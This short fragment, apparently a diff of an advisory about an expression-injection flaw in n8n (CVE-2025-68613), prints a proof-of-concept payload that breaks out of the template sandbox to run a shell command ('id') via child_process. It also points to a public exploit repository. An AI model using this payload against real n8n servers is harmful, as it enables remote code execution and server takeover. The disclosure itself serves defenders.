Critical Expression Injection Vulnerability in n8n (CVE-2025-68613)

 {{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

-Note: This exploit is publicly documented at wioui/n8n-CVE-2025-68613-exploit.
+Note: A public exploit is available at wioui/n8n-CVE-2025-68613-exploit.

 Impact and Risks